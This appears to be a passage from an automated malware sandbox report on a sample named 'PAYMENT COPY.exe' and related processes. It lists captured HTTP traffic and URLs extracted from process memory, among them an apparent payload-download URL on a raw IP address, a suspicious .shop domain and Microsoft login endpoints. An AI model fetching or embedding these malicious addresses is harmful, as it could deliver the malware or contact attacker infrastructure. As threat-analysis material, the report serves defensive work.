                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:11:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:11:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:06 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:08 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:11 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:13 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:13:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:44:51 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9w0e2HTQiKkyveNbuXIOJ%2BHReFVgS6M9AjbZZclQrr7e22aAdVk6KEQhQp9J0ln3sNBOgV%2B6J5eYHLIVlT8AAMj2o4uPmyrMAjJ4jd4M3rKLRKngi4l0t4VdBy4F2XEmPKXBYHB5dQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e997471fbf7d14-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1955&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=685&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f db 36 10 7e cf af b8 a9 d8 b0 01 95 68 59 69 13 4b b2 80 cc 4e b0 02 5d 17 ac 2e b6 3e d2 d2 59 64 23 91 1a 79 92 ad 05 fd ef 05 25 c5 76 b0 ad 0f 43 a9 17 ea f8 dd f7 1d 0f f7 31 fd 6e fd db 6a f3 f1 fe 16 04 d5 15 dc 7f f8 f9 ed 9b 15 78 3e 63 7f 44 2b c6 d6 9b 35 fc f9 cb e6 d7 b7 10 06 33 78 4f 46 e6 c4 d8 ed 3b 0f 3c 41 d4 c4 8c ed f7 fb 60 1f 05 da 94 6c f3 3b 3b 38 96 d0 a5 4d 5b df 0e 39 41 41 85 97 5d a4 83 c8 a1 ae 94 5d fe 0b 41 b8 58 2c c6 3c cf 81 e2 8a ab 72 e9 a1 f2 e0 b8 cb 52 81 bc c8 2e 00 00 52 92 54 61 76 39 bb 84 1f ea 82 5b 91 c0 3b 4d 70 a7 5b 55 a4 6c 3c 1c 81 35 12 07 a7 e7 e3 5f ad ec 96 de 4a 2b 42 45 fe a6 6f d0 83 7c fc 5b 7a 84 07 62 4e 3f 81 5c 70 63 91 96 1f 36 77 fe b5 c7 ce 89 14 af 71 e9 15 68 73 23 1b 92 5a 9d 31 bc d7 c6 f4 2f a1 e1 25 82 d2 04 3b 57 cc 31 dd 52 5f 21 50 df e0 a4 95 5b eb 8d 67 6e 6d 75 d1 c3 e3 4e 2b f2 ad fc 1b e3 f0 b2 39 24 90 eb 4a 9b f8 c5 d5 b0 12 18 8e 77 bc 96 55 1f 73 23 79 95 80 a3 f2 79 25 4b 15 e7 a8 08 4d f2 f9 c8 29 c2 67 8c d7 b3 33 ca c5 e2 e6 ea e6 2e 81 9a Data Ascii: 2ecTQo6~hYiKN].>Yd#y%vC1njx>cD+53xOF;<A`l;;8M[9AA]]AX,<rR.RTav9[;Mp[Ul<5_J+BEo|[zbN?\pc6wqhs#Z1/%;W1R_!P[gnmuN+9$JwUs#yy%KM)g3.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:13:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:44:51 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MuAPBGxUumRxn8tqI5D2a7ZntSeaWUscgHVOz7XcZO4NRMVVNGsxSSkzB9Zg%2BG%2BxDwwtvhE7rnZFxArrpde4c63cxqLlFJU4pl%2BR4moFO427enswYVdDN5qYlBxpLmYrTCJIUXlQ2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e997570852fbf2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2030&min_rtt=2030&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=106&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f db 36 10 7e cf af b8 a9 d8 b0 01 95 68 59 69 13 4b b2 80 cc 4e b0 02 5d 17 ac 2e b6 3e d2 d2 59 64 23 91 1a 79 92 ad 05 fd ef 05 25 c5 76 b0 ad 0f 43 a9 17 ea f8 dd f7 1d 0f f7 31 fd 6e fd db 6a f3 f1 fe 16 04 d5 15 dc 7f f8 f9 ed 9b 15 78 3e 63 7f 44 2b c6 d6 9b 35 fc f9 cb e6 d7 b7 10 06 33 78 4f 46 e6 c4 d8 ed 3b 0f 3c 41 d4 c4 8c ed f7 fb 60 1f 05 da 94 6c f3 3b 3b 38 96 d0 a5 4d 5b df 0e 39 41 41 85 97 5d a4 83 c8 a1 ae 94 5d fe 0b 41 b8 58 2c c6 3c cf 81 e2 8a ab 72 e9 a1 f2 e0 b8 cb 52 81 bc c8 2e 00 00 52 92 54 61 76 39 bb 84 1f ea 82 5b 91 c0 3b 4d 70 a7 5b 55 a4 6c 3c 1c 81 35 12 07 a7 e7 e3 5f ad ec 96 de 4a 2b 42 45 fe a6 6f d0 83 7c fc 5b 7a 84 07 62 4e 3f 81 5c 70 63 91 96 1f 36 77 fe b5 c7 ce 89 14 af 71 e9 15 68 73 23 1b 92 5a 9d 31 bc d7 c6 f4 2f a1 e1 25 82 d2 04 3b 57 cc 31 dd 52 5f 21 50 df e0 a4 95 5b eb 8d 67 6e 6d 75 d1 c3 e3 4e 2b f2 ad fc 1b e3 f0 b2 39 24 90 eb 4a 9b f8 c5 d5 b0 12 18 8e 77 bc 96 55 1f 73 23 79 95 80 a3 f2 79 25 4b 15 e7 a8 08 4d f2 f9 c8 29 c2 67 8c d7 b3 33 ca c5 e2 e6 ea e6 Data Ascii: 2f7TQo6~hYiKN].>Yd#y%vC1njx>cD+53xOF;<A`l;;8M[9AA]]AX,<rR.RTav9[;Mp[Ul<5_J+BEo|[zbN?\pc6wqhs#Z1/%;W1R_!P[gnmuN+9$JwUs#yy%KM)g3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:13:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:44:51 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NVFFZE8Tf%2BxSCCpGky3nrb9R%2BfbITv5RFW%2FZgQR69lAha05iDycXs%2Bb3D5dRv%2FJJgZ%2Fo77NkRwcyzldMnIwDw5jVmPxP3yMXo5zs197VuePXXfKdN3OGiau0vFT%2FApf7hjfVnPX0vA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e99766fd17424d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1726&rtt_var=863&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=869&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f db 36 10 7e cf af b8 a9 d8 b0 01 95 68 59 69 13 4b b2 80 cc 4e b0 02 5d 17 ac 2e b6 3e d2 d2 59 64 23 91 1a 79 92 ad 05 fd ef 05 25 c5 76 b0 ad 0f 43 a9 17 ea f8 dd f7 1d 0f f7 31 fd 6e fd db 6a f3 f1 fe 16 04 d5 15 dc 7f f8 f9 ed 9b 15 78 3e 63 7f 44 2b c6 d6 9b 35 fc f9 cb e6 d7 b7 10 06 33 78 4f 46 e6 c4 d8 ed 3b 0f 3c 41 d4 c4 8c ed f7 fb 60 1f 05 da 94 6c f3 3b 3b 38 96 d0 a5 4d 5b df 0e 39 41 41 85 97 5d a4 83 c8 a1 ae 94 5d fe 0b 41 b8 58 2c c6 3c cf 81 e2 8a ab 72 e9 a1 f2 e0 b8 cb 52 81 bc c8 2e 00 00 52 92 54 61 76 39 bb 84 1f ea 82 5b 91 c0 3b 4d 70 a7 5b 55 a4 6c 3c 1c 81 35 12 07 a7 e7 e3 5f ad ec 96 de 4a 2b 42 45 fe a6 6f d0 83 7c fc 5b 7a 84 07 62 4e 3f 81 5c 70 63 91 96 1f 36 77 fe b5 c7 ce 89 14 af 71 e9 15 68 73 23 1b 92 5a 9d 31 bc d7 c6 f4 2f a1 e1 25 82 d2 04 3b 57 cc 31 dd 52 5f 21 50 df e0 a4 95 5b eb 8d 67 6e 6d 75 d1 c3 e3 4e 2b f2 ad fc 1b e3 f0 b2 39 24 90 eb 4a 9b f8 c5 d5 b0 12 18 8e 77 bc 96 55 1f 73 23 79 95 80 a3 f2 79 25 4b 15 e7 a8 08 4d f2 f9 c8 29 c2 67 8c d7 b3 Data Ascii: 2f7TQo6~hYiKN].>Yd#y%vC1njx>cD+53xOF;<A`l;;8M[9AA]]AX,<rR.RTav9[;Mp[Ul<5_J+BEo|[zbN?\pc6wqhs#Z1/%;W1R_!P[gnmuN+9$JwUs#yy%KM)g
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:13:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:44:51 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DkCCxsZQ1cOxnyMb7iN1sbjQ%2FGRxsZyyh9ve11z13ieG7ML18BuH1Zh62wL77c7xLwJoZDWMZoqMhK%2FpxyFjMgW6ddjsxw6Xjtmt8omZHEGtkynuKHJoxi7ieBylyMUN81ZwU9yMKQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e99776db854261-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1675&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=427&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 604<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 08:13:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzip
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 08:13:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzip
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 08:13:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzip
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 08:13:33 GMTContent-Type: text/htmlContent-Length: 7979Connection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: "1f2b-59f878ddd2a87"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:47 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.83.222
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.83.222/win32/panel/uploads/Rymwg.wav
                      Source: PAYMENT COPY.exe, HashSize.exe.0.drString found in binary or memory: http://196.251.83.222/win32/panel/uploads/Rymwg.wavYWxCF4U7xiIliA
                      Source: BMYdhGJqo1.exe, 00000008.00000002.3353285344.000000000419C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: BMYdhGJqo1.exe, 00000008.00000002.3351843666.0000000002674000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jingdongpt.shop
                      Source: BMYdhGJqo1.exe, 00000008.00000002.3351843666.0000000002674000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jingdongpt.shop/j64s/
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: finger.exe, 00000004.00000002.3353879564.00000000053EE000.00000004.10000000.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3353285344.000000000432E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ad.netowl.jp/js/star-errorpage.js?date=
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: finger.exe, 00000004.00000002.3353879564.0000000004116000.00000004.10000000.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3353285344.0000000003056000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: finger.exe, 00000004.00000003.1344984477.0000000007CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029CF000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
